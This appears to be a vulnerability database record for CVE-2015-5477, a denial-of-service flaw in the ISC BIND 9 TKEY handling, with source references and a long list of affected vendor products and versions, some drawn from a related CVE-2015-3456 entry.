ID

VAR-E-201505-0004


CVE

cve_id:CVE-2015-5477

Trust: 3.6

cve_id:CVE-2015-3456

Trust: 0.3

sources: BID: 74640 // BID: 76092 // PACKETSTORM: 132926 // EXPLOIT-DB: 37721 // EDBNET: 58904 // EDBNET: 23565 // EDBNET: 23577

EDB ID

37721


TITLE

ISC BIND 9 - TKEY (PoC) - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37721

DESCRIPTION

ISC BIND 9 - TKEY (PoC). CVE-2015-5477 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 37721

AFFECTED PRODUCTS

vendor:bind9model: - scope: - version: -

Trust: 1.2

vendor:iscmodel:bindscope:eqversion:9

Trust: 1.0

vendor:ubuntumodel:linuxscope:eqversion:15.04

Trust: 0.6

vendor:ubuntumodel:linux ltsscope:eqversion:14.04

Trust: 0.6

vendor:ubuntumodel:linux lts i386scope:eqversion:12.04

Trust: 0.6

vendor:ubuntumodel:linux lts amd64scope:eqversion:12.04

Trust: 0.6

vendor:susemodel:linux enterprise server sp4 ltssscope:eqversion:10

Trust: 0.6

vendor:s u s emodel:opensusescope:eqversion:13.2

Trust: 0.6

vendor:s u s emodel:opensusescope:eqversion:13.1

Trust: 0.6

vendor:redhatmodel:enterprise linux workstationscope:eqversion:7

Trust: 0.6

vendor:redhatmodel:enterprise linux workstationscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux serverscope:eqversion:7

Trust: 0.6

vendor:redhatmodel:enterprise linux serverscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux hpc nodescope:eqversion:7

Trust: 0.6

vendor:redhatmodel:enterprise linux hpc nodescope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux desktopscope:eqversion:7

Trust: 0.6

vendor:redhatmodel:enterprise linux desktopscope:eqversion:6

Trust: 0.6

vendor:redhatmodel:enterprise linux desktop clientscope:eqversion:5

Trust: 0.6

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.6

vendor:oraclemodel:enterprise linuxscope:eqversion:7

Trust: 0.6

vendor:oraclemodel:enterprise linuxscope:eqversion:5

Trust: 0.6

vendor:junipermodel:northstar controller applicationscope:eqversion:2.1.0

Trust: 0.6

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.6

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.6

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.6

vendor:centosmodel:centosscope:eqversion:7

Trust: 0.6

vendor:centosmodel:centosscope:eqversion:5

Trust: 0.6

vendor:junipermodel:northstar controller application service packscope:neversion:2.1.01

Trust: 0.6

vendor:junipermodel:junos 12.1x44-d20scope: - version: -

Trust: 0.6

vendor:f5model:big-ip ltmscope:eqversion:11.5

Trust: 0.6

vendor:bindmodel:tkey queryscope: - version: -

Trust: 0.5

vendor:xenmodel:xenscope:eqversion:4.5.0

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.4.1

Trust: 0.3

vendor:xenmodel:rc1scope:eqversion:4.4.0

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.4.0

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.3.1

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.3.0

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.2.3

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.2.2

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.2.1

Trust: 0.3

vendor:xenmodel:xenscope:eqversion:4.2.0

Trust: 0.3

vendor:ubuntumodel:linuxscope:eqversion:14.10

Trust: 0.3

vendor:susemodel:linux enterprise software development kit sp3scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp3scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp2scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp1scope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp4scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise server sp3scope:eqversion:10

Trust: 0.3

vendor:susemodel:linux enterprise software development kitscope:eqversion:12

Trust: 0.3

vendor:susemodel:linux enterprise serverscope:eqversion:12

Trust: 0.3

vendor:susemodel:linux enterprise server sp2 ltssscope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise server sp1 ltssscope:eqversion:11

Trust: 0.3

vendor:susemodel:linux enterprise expanded supportscope:eqversion:7

Trust: 0.3

vendor:susemodel:linux enterprise expanded supportscope:eqversion:6

Trust: 0.3

vendor:susemodel:linux enterprise expanded supportscope:eqversion:5

Trust: 0.3

vendor:susemodel:linux enterprise desktopscope:eqversion:12

Trust: 0.3

vendor:susemodel:linux enterprise desktop sp3scope:eqversion:11

Trust: 0.3

vendor:redhatmodel:openstack for rhelscope:eqversion:6.07

Trust: 0.3

vendor:redhatmodel:openstack for rhelscope:eqversion:5.07

Trust: 0.3

vendor:redhatmodel:openstack for rhelscope:eqversion:5.06

Trust: 0.3

vendor:redhatmodel:openstackscope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise virtualizationscope:eqversion:3

Trust: 0.3

vendor:redhatmodel:enterprise linux virtualization serverscope:eqversion:5

Trust: 0.3

vendor:redhatmodel:enterprise linux server eus 6.5.zscope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:6.5

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop multi os clientscope:eqversion:5

Trust: 0.3

vendor:qemumodel:qemuscope:eqversion:0

Trust: 0.3

vendor:oraclemodel:peoplesoft enterprise peopletoolsscope:eqversion:8.54

Trust: 0.3

vendor:oraclemodel:peoplesoft enterprise peopletoolsscope:eqversion:8.53

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6.2

Trust: 0.3

vendor:oraclemodel:enterprise linuxscope:eqversion:6

Trust: 0.3

vendor:joyentmodel:smartdatacenterscope:eqversion:0

Trust: 0.3

vendor:joyentmodel:public cloudscope:eqversion:0

Trust: 0.3

vendor:ibmmodel:pureapplication systemscope:eqversion:2.1

Trust: 0.3

vendor:ibmmodel:pureapplication systemscope:eqversion:2.0

Trust: 0.3

vendor:ibmmodel:powerkvmscope:eqversion:2.1

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.3.20

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.3.3.0

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.3.1.0

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.3.0.1

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.3.0.0

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.2.1.0

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.2.0.0

Trust: 0.3

vendor:ibmmodel:flex system managerscope:eqversion:1.1.0.0

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r005c10scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r005c00spc300scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r005c00scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r003c10spc600scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r003c10cp6001scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r003c10scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r003c00spc300scope: - version: -

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r003c00scope: - version: -

Trust: 0.3

vendor:hpmodel:helion openstackscope:eqversion:1.1.0

Trust: 0.3

vendor:hpmodel:helion openstackscope:eqversion:1.0.0

Trust: 0.3

vendor:hpmodel:helion cloudsystemscope:eqversion:8.1

Trust: 0.3

vendor:fortinetmodel:fortisandboxscope:eqversion:2.0.2

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:6.0.2

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:6.5

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:6.2

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:6.1

Trust: 0.3

vendor:citrixmodel:xenserverscope:eqversion:6.0

Trust: 0.3

vendor:centosmodel:centosscope:eqversion:6

Trust: 0.3

vendor:huaweimodel:fusioncompute v100r005c00cp3001scope:neversion: -

Trust: 0.3

vendor:fortinetmodel:fortisandboxscope:neversion:2.0.3

Trust: 0.3

vendor:susemodel:opensuse evergreenscope:eqversion:11.4

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:14.1

Trust: 0.3

vendor:slackwaremodel:linux x86 64 -currentscope: - version: -

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:14.1

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:14.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:14.0

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:13.37

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.37

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:13.1

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.1

Trust: 0.3

vendor:slackwaremodel:linux x86 64scope:eqversion:13.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.0

Trust: 0.3

vendor:slackwaremodel:linux -currentscope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop workstation clientscope:eqversion:5

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.4

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.3

Trust: 0.3

vendor:oraclemodel:vm server forscope:eqversion:x863.2

Trust: 0.3

vendor:oraclemodel:solarisscope:eqversion:11.2

Trust: 0.3

vendor:oraclemodel:solarisscope:eqversion:10

Trust: 0.3

vendor:netappmodel:clustered data ontapscope:eqversion:0

Trust: 0.3

vendor:junipermodel:junos os 12.3x50-d42scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 15.1x49-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 15.1x49-d10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 15.1r1scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 15.1f2-s2scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.2r4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.2r3scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.2r2scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.2r1scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d26scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d25scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d18scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d16scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d12scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1x53-d10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1r5scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1r4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1r3scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1r2scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 14.1r1scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d36scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d30scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d26scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d25scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2x51-d15scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r8scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r7scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r6scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r5scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r3scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 13.2r1scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3x48-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3x48-d15scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3x48-d10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r9scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r8scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r7scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r5scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r4.6scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r3.4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r2-s3scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r2scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r10.2scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.3r1.8scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x47-d25scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x47-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x47-d15scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x47-d11scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x47-d10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d36scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d35scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d30scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d25scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d20.5scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d20scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d15scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x46-d10scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d51scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d50scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d45scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d40scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d35.5scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d35scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d34scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d33scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d32scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d30.4scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d30scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d26scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d25scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d24scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d20.3scope: - version: -

Trust: 0.3

vendor:junipermodel:junos 12.1x44-d15scope: - version: -

Trust: 0.3

vendor:junipermodel:junos d40scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d35scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d30scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d25scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d20scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d15scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junos d10scope:eqversion:12.1x44

Trust: 0.3

vendor:junipermodel:junosscope:eqversion:12.1x44

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.6

Trust: 0.3

vendor:iscmodel:bind p3scope:eqversion:9.5.1

Trust: 0.3

vendor:iscmodel:bind p1scope:eqversion:9.5.1

Trust: 0.3

vendor:iscmodel:bind a2scope:eqversion:9.5

Trust: 0.3

vendor:iscmodel:bind a1scope:eqversion:9.5

Trust: 0.3

vendor:iscmodel:bind p3scope:eqversion:9.4.3

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.4.3

Trust: 0.3

vendor:iscmodel:bind -p1scope:eqversion:9.4.1

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.4.1

Trust: 0.3

vendor:iscmodel:bind rc2scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind rc1scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind b4scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind b3scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind b2scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind b1scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a6scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a5scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a4scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a3scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a2scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind a1scope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.4

Trust: 0.3

vendor:iscmodel:bind p1scope:eqversion:9.3.6

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.6

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.5

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.4

Trust: 0.3

vendor:iscmodel:bind rc3scope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bind rc2scope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bind rc1scope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bind b1scope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bind bscope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.3

Trust: 0.3

vendor:iscmodel:bind -p2scope:eqversion:9.3.2

Trust: 0.3

vendor:iscmodel:bind -p1scope:eqversion:9.3.2

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.2

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3.1

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.3

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.8

Trust: 0.3

vendor:iscmodel:bind rc3scope:eqversion:9.2.7

Trust: 0.3

vendor:iscmodel:bind rc2scope:eqversion:9.2.7

Trust: 0.3

vendor:iscmodel:bind rc1scope:eqversion:9.2.7

Trust: 0.3

vendor:iscmodel:bind b1scope:eqversion:9.2.7

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.7

Trust: 0.3

vendor:iscmodel:bind -p2scope:eqversion:9.2.6

Trust: 0.3

vendor:iscmodel:bind -p1scope:eqversion:9.2.6

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.6

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.5

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.4

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.3

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.2

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2.1

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.2

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.1.3

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.1.2

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.1.1

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.1

Trust: 0.3

vendor:iscmodel:bind 9.7.1-p2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind p1scope:eqversion:9.7.1

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.7.1

Trust: 0.3

vendor:iscmodel:bind p2scope:eqversion:9.7.0

Trust: 0.3

vendor:iscmodel:bindscope:eqversion:9.7.0

Trust: 0.3

vendor:iscmodel:bind 9.6.1-p3scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.6.1-p2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.6.0-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.2-p2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.2-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.1b1scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0b2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0b1scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0a7scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0a6scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0a5scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0a4scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0a3scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.5.0-p2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.4.3b2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.4.3-p5scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.4.3-p4scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.4.3-p1scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.4.2-p2scope: - version: -

Trust: 0.3

vendor:iscmodel:bind 9.3.5-p2scope: - version: -

Trust: 0.3

vendor:ibmmodel:viosscope:eqversion:2.2

Trust: 0.3

vendor:ibmmodel:smartcloud provisioning for software virtual appliancescope:eqversion:2.1

Trust: 0.3

vendor:ibmmodel:netezza host managementscope:eqversion:5.3.7.0

Trust: 0.3

vendor:ibmmodel:lotus protector for mail securityscope:eqversion:2.80

Trust: 0.3

vendor:ibmmodel:lotus protector for mail securityscope:eqversion:2.8.1.0

Trust: 0.3

vendor:ibmmodel:i v5r4scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v5r4scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v5r4scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v5r3scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v5r3scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v5r3scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v5r3scope: - version: -

Trust: 0.3

vendor:ibmmodel:i v5r2scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v5r2scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v5r2scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v5r1scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v5r1scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v5r1scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v4r4scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v4r4scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v4r4scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v4r3scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v4r3scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v4r3scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v4r2scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v4r2scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v4r2scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v4r1scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v4r1scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v4r1scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:i v3r7scope:eqversion:7.2

Trust: 0.3

vendor:ibmmodel:i v3r7scope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:i v3r7scope:eqversion:6.1

Trust: 0.3

vendor:ibmmodel:aixscope:eqversion:7.1

Trust: 0.3

vendor:ibmmodel:aixscope:eqversion:6.1

Trust: 0.3

vendor:hpmodel:vcxscope:eqversion:9.8.17

Trust: 0.3

vendor:hpmodel:tcp/ip services for openvms bind eco5scope:eqversion:5.7

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31.09scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31.08scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31.06scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.31scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.23scope: - version: -

Trust: 0.3

vendor:hpmodel:hp-ux b.11.11scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p9scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p6scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p5scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p3scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p2scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p13scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p10scope: - version: -

Trust: 0.3

vendor:freebsdmodel:9.3-release-p1scope: - version: -

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:9.3

Trust: 0.3

vendor:freebsdmodel:8.4-release-p9scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p8scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p7scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p4scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p27scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p24scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p23scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p20scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p19scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p17scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p16scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p15scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p14scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p13scope: - version: -

Trust: 0.3

vendor:freebsdmodel:8.4-release-p12scope: - version: -

Trust: 0.3

vendor:freebsdmodel:freebsdscope:eqversion:8.4

Trust: 0.3

vendor:f5model:enterprise managerscope:eqversion:3.1.1

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.5

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.4

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.3

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.2

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.1

Trust: 0.3

vendor:f5model:big-iq securityscope:eqversion:4.0

Trust: 0.3

vendor:f5model:big-iq devicescope:eqversion:4.5

Trust: 0.3

vendor:f5model:big-iq devicescope:eqversion:4.4

Trust: 0.3

vendor:f5model:big-iq devicescope:eqversion:4.3

Trust: 0.3

vendor:f5model:big-iq devicescope:eqversion:4.2

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.5

Trust: 0.3

vendor:f5model:big-iq cloud hf2scope:eqversion:4.4

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.4

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.3

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.2

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.1

Trust: 0.3

vendor:f5model:big-iq cloudscope:eqversion:4.0

Trust: 0.3

vendor:f5model:big-iq adcscope:eqversion:4.5

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip wom hf5scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip wom hf3scope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip wom hf5scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip wom hf3scope:eqversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip wom hf7scope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.3

Trust: 0.3

